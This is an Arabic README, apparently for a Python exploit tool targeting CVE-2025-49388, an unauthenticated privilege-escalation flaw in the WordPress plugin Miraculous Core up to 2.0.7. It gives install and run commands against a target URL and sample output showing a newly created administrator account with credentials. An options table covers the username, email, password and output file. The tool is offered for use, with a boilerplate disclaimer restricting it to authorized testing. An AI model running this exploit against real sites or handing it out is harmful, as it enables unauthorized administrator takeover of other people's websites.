
Miraculous Core (kamleshyadav) ≤ 2.0.7 — تصعيد امتيازات بدون مصادقة
مكوّن WordPress الإضافي Miraculous Core بإصدار <= 2.0.7 معرّض لثغرة تصعيد الامتيازات
ثغرة تخصيص الامتيازات بشكل غير صحيح في مكوّن Miraculous Core الخاص بالمطوّر kamleshyadav تسمح للمهاجمين غير المصادَق عليهم بتصعيد الامتيازات وإنشاء حسابات مسؤول.
الإصدارات المتأثرة: غير متاح حتى 2.0.7
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (لم يُقدَّم التقييم بعد)
يعمل هذا السكربت المكتوب بلغة Python على أتمتة استغلال CVE-2025-49388 عبر إنشاء حساب مسؤول جديد في مواقع WordPress المصابة التي تحتوي على مكوّن Miraculous Core.
يوفر موثوقية عالية، ويولّد بيانات عشوائية لاستغلال موثوق ومتكرر، ويتعامل تلقائيًا مع الترويسات وملفات تعريف الارتباط ومحاولات الالتفاف.
تثبيت التبعيات:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPTIONS]
مثال:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
ملاحظة:
إذا حذفت اسم المستخدم أو البريد الإلكتروني، فسيتم توليد قيم عشوائية لكل تشغيل لتجنب أخطاء التكرار.
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
تُقدَّم هذه الأداة لأغراض تعليمية واختبارات أمنية مصرَّح بها فقط.
استغلال الأنظمة دون إذن صريح غير قانوني وغير أخلاقي.
لا يتحمّل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار. استخدمها بمسؤولية.
| Option | Description | Example |
|---|
-u, --url | رابط WordPress الهدف (مطلوب) | -u http://target.com/wordpress |
-un, --username | اسم المستخدم المطلوب (الافتراضي: عشوائي) | -un admin1337 |
-fn, --full_name | الاسم الكامل (الافتراضي: Nxploited) | -fn "John Doe" |
-em, --useremail | البريد الإلكتروني (الافتراضي: عشوائي) | -em [email protected] |
-pw, --password | كلمة المرور (الافتراضي: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | تسجيل النتائج في ملف | -o result.txt |